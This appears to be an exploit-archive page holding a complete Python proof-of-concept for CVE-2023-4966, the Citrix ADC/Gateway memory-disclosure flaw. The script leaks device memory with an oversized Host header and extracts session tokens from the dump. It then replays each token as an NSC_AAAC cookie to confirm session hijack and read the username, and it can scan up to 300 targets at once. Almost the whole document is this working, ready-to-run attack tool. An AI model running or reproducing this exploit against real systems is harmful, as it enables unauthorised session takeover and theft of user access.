4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import re
import sys
import hexdump
import argparse
import requests

from rich.console import Console
from urllib.parse import urlparse
from alive_progress import alive_bar
from typing import List, Tuple, Optional, TextIO
from concurrent.futures import ThreadPoolExecutor, as_completed

warnings = requests.packages.urllib3
warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning)

class CitrixMemoryDumper:
    
    def __init__(self):
        self.console = Console()
        self.parser = argparse.ArgumentParser(description='Citrix ADC Memory Dumper')
        self.setup_arguments()
        self.results: List[Tuple[str, str]] = []
        self.output_file: Optional[TextIO] = None
        if self.args.output:
            self.output_file = open(self.args.output, 'w')

    def setup_arguments(self) -> None:
        self.parser.add_argument('-u', '--url', help='The Citrix ADC / Gateway target (e.g., https://192.168.1.200)')
        self.parser.add_argument('-f', '--file', help='File containing a list of target URLs (one URL per line)')
        self.parser.add_argument('-o', '--output', help='File to save the output results')
        self.parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose mode')
        self.parser.add_argument('--only-valid', action='store_true', help='Only show results with valid sessions')
        self.args = self.parser.parse_args()
        
    def print_results(self, header: str, result: str) -> None:
        if self.args.only_valid and "[+]" not in header:
            return

        formatted_msg = f"{header} {result}"
        self.console.print(formatted_msg, style="white")
        if self.output_file:
            self.output_file.write(result + '\n')

    def normalize_url(self, url: str) -> str:
        if not url.startswith("http://") and not url.startswith("https://"):
            url = f"https://{url}"
        
        parsed_url = urlparse(url)
        normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
        return normalized_url

    def dump_memory(self, url: str) -> None:
        full_url = self.normalize_url(url)
        headers = {
            "Host": "a" * 24576
        }

        try:
            r = requests.get(
                f"{full_url}/oauth/idp/.well-known/openid-configuration",
                headers=headers,
                verify=False,
                timeout=10,
            )
            content_bytes = r.content

            if r.status_code == 200 and content_bytes:
                
                if b"\x00"*16 in content_bytes:
                    cleaned_content = self.clean_bytes(content_bytes)
                    for _ in range(10):
                        cleaned_content = cleaned_content.replace(b'a'*65, b'').replace(b'a'*32, b'')
                        content_bytes = content_bytes.replace(b'a'*65, b'').replace(b'a'*32, b'')
                    
                    if self.args.verbose and self.args.url:
                        self.results.append(("[bold blue][*][/bold blue]", f"Memory Dump for {full_url}"))
                        hex_output = hexdump.hexdump(content_bytes, result='return').strip()
                        self.results.extend([("", line) for line in hex_output.splitlines()])
                        self.results.append(("[bold blue][*][/bold blue]", "End of Dump\n"))

                    session_tokens = self.find_session_tokens(content_bytes)
                    valid_token_found = False
                    for token in session_tokens:
                        if self.test_session_cookie(full_url, token):
                            valid_token_found = True

                    if not valid_token_found:
                        if not self.args.only_valid:
                            if self.args.url:
                                self.results.append(("[bold yellow][!][/bold yellow]", f"Partial memory dump but no valid session token found for {full_url}."))
                            else:
                                self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {full_url}, but no valid session token found."))
                elif self.args.verbose and self.args.url:
                    self.results.append(("[bold red][-][/bold red]", f"Could not dump memory for {full_url}."))
        
        except Exception as e:
            if self.args.verbose and self.args.url:
                self.results.append(("[bold red][-][/bold red]", f"Error processing {full_url}: {str(e)}."))

    def clean_bytes(self, data: bytes) -> bytes:
        return b''.join(bytes([x]) for x in data if 32 <= x <= 126)
   
    def find_session_tokens(self, content_bytes: bytes) -> List[str]:
        TOKEN_65_PATTERN = re.compile(rb'(?=([a-f0-9]{65}))')
        TOKEN_32_PATTERN = re.compile(rb'(?=([a-f0-9]{32}))')

        sessions_65 = [match.group(1).decode('utf-8') for match in TOKEN_65_PATTERN.finditer(content_bytes) if match.group(1).endswith(b'45525d5f4f58455e445a4a42') and not match.group(1).startswith(b'a'*65)]
        sessions_32 = [match.group(1).decode('utf-8') for match in TOKEN_32_PATTERN.finditer(content_bytes) if not match.group(1).startswith(b'a'*32)]

        combined_sessions = list(dict.fromkeys(sessions_65 + sessions_32))
        return combined_sessions

    def test_session_cookie(self, url: str, session_token: str) -> bool:
        headers = {
            "Cookie": f"NSC_AAAC={session_token}"
        }
        try:
            r = requests.post(
                f"{url}/logon/LogonPoint/Authentication/GetUserName",
                headers=headers,
                verify=False,
                timeout=10,
            )

            if r.text.count('\n') > 0:
                return False
            
            if r.status_code == 200:
                username = r.text.strip()
                self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {url}, Cookie: {session_token}, Username: {username}"))
                return True
            else:
                return False
        except Exception as e:
            if self.args.verbose and self.args.url:
                self.results.append(("[bold red][-][/bold red]", f"Error testing cookie for {url}: {str(e)}."))
            return False
        
    def run(self) -> None:
        if self.args.url:
            self.dump_memory(self.args.url)
            for header, result in self.results:
                self.print_results(header, result)
        elif self.args.file:
            with open(self.args.file, 'r') as file:
                urls = file.read().splitlines()
                with ThreadPoolExecutor(max_workers=300) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
                    futures = {executor.submit(self.dump_memory, url): url for url in urls}
                    for future in as_completed(futures):
                        for header, result in self.results:
                            self.print_results(header, result)
                        self.results.clear()
                        bar()
        else:
            self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white")
            sys.exit(1)
        
        if self.output_file:
            self.output_file.close()

if __name__ == "__main__":
    dumper = CitrixMemoryDumper()
    dumper.run()